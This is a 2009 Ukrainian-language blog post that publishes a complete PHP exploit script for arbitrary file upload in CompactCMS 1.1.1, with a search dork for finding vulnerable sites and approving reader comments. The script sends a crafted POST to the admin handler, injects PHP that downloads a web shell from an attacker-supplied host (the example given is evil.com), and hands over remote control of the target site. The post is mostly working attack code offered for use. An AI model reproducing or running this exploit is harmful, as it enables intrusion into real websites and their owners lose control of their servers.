Home > Безпека, Експлоіти/Exploits > CompactCMS Remote Arbitrary File Upload Exploit

CompactCMS Remote Arbitrary File Upload Exploit

October 15th, 2009 Dimi4 Leave a comment Go to comments

Писав вже давно, лежало в RoA на античаті,  тепер думаю немає ніякого сенсу зберігати його в приваті.

http://uasc.org.ua/files/compactcms.php.txt

  1. <?php
  2.  
  3. /**
  4.  * @Product: MMIX – CompactCMS
  5.  * @Version: 1.1.1
  6.  * @Site: CompactCMS.nl
  7.  * @Dork: "© 2009 CompactCMS"  
  8.  * @Found by: Dimi4  
  9.  * @Date: 8.04.2009
  10.  *  @Bug Function [admin\handler.inc.php] [50-62 lines] :
  11.  *  */
  12. /////////////////////////////////////////////////////////////////////
  13. ## $name        = htmlentities($_GET['file']);                      #
  14. ## $content = $_POST['content'];                                    #
  15. ## $filename    = "../content/".htmlentities($_GET['file']).".php"; #
  16. ##                                                                  #
  17. ##  if (is_writable($filename)) {                                   #
  18. ##      if (!$handle = fopen($filename, ‘w’)) {                     #
  19. ##           echo "[ERR105] ".$sw_err02." (".$filename.").";        #
  20. ##           exit;                                                  #
  21. ##      }                                                           #
  22. ##      if (fwrite($handle, $content) === FALSE) {                  #
  23. ##          echo "[ERR106] ".$sw_err03." (".$filename.").";         #
  24. ##          exit;                                                   #
  25. ##      }                                                           #
  26.  ////////////////////////////////////////////////////////////////////  
  27. error_reporting(0);
  28. set_time_limit(0);
  29.  
  30. function http_send($host, $packet)
  31. {
  32.  if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
  33.  die("\nsocket_create(): " . socket_strerror($s) . "\n");
  34.  
  35.  if (socket_connect($s, $host, 80) == false)
  36.  die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
  37.  
  38.  socket_write($s, $packet, strlen($packet));
  39.  while ($m = socket_read($s, 2048)) $response .= $m;
  40.  
  41.  socket_close($s);
  42.  return $response;
  43. }
  44.  
  45. function help()
  46.  {
  47.  global $argv;
  48.  echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
  49.  echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
  50.  echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
  51.  echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
  52.  die();
  53.  }
  54.  
  55. if ($argv[1] == "") {
  56.  help();
  57.  die();
  58.  }
  59.  
  60. $host = $argv[1];
  61. $path = $argv[2];
  62. $shell = $argv[3];
  63. $login = $argv[4];
  64. $pass = $argv[5];
  65. $tmpshell = "1123";
  66. $shellname = "manpage.php";
  67.  
  68. $payload .= "action=Save changes&amp;content=<?php copy(‘{$shell}’, ‘./{$shellname}’); unlink(‘{$tmpshell}.php’); header(‘Location:{$shellname}’);?>\r\n\r\n";
  69.  
  70. echo("
  71. ——————————————————————
  72. \tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit
  73. ——————————————————————\n\n");
  74. echo("**\t Coded by Dimi4, greetz Antichat\n\n");
  75. echo ("[+] Connecting to {$host}…\n");
  76.  
  77. $packet  = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
  78. $packet .= "Host: {$host}\r\n";
  79. $packet .= "prama: no-cache\r\n";
  80. if(!empty($login) &amp;&amp; !empty($pass))
  81. {
  82.  $packet .= "Authorization: Basic ".base64_encode($login.’:’.$pass)."\r\n";
  83. }
  84. $packet .= "Accept: text/html\r\n";
  85. $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
  86. $packet .= "Content-Length: ".strlen($payload)."\n\n";
  87. $packet .= $payload;
  88. $response = http_send($host, $packet);
  89. //echo ($response);
  90.  
  91. if (preg_match("/WWW-Authenticate/i", $response))
  92. {
  93.  die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
  94. }
  95. else
  96. {
  97.  echo ("[+] Sending Payload…\n");
  98.  echo ("[+] Downloading shell…\n");
  99.  if(!file_get_contents($shell))
  100.  {
  101.  echo ("\t[!] Warning! Can’t Download shell!\n");
  102.  $warning = "Maybe";
  103.  }
  104.  echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
  105.  die();
  106. }
  107.  
  108. ?>
Categories: Безпека, Експлоіти/Exploits Tags: , ,
  1. login999
    October 15th, 2009 at 19:22 | #1
    Reply | Quote

    Молодець , а що ще скажеш :)

  2. xa-xa89
    October 15th, 2009 at 20:15 | #2
    Reply | Quote

    Даєшь злиття привату з РОА=)=)=)
    а взагалі, молодець)

  3. ZEXEL
    October 16th, 2009 at 11:59 | #3
    Reply | Quote

    Dmi4 – викладуй все порно з ROA.
    Доречі, багато сайтів с CompactCMS ?

  4. Dimi4
    October 16th, 2009 at 12:35 | #4
    Reply | Quote

    а фіг його знає)
    А все з роа неможу злити) Права немаю))

  1. No trackbacks yet.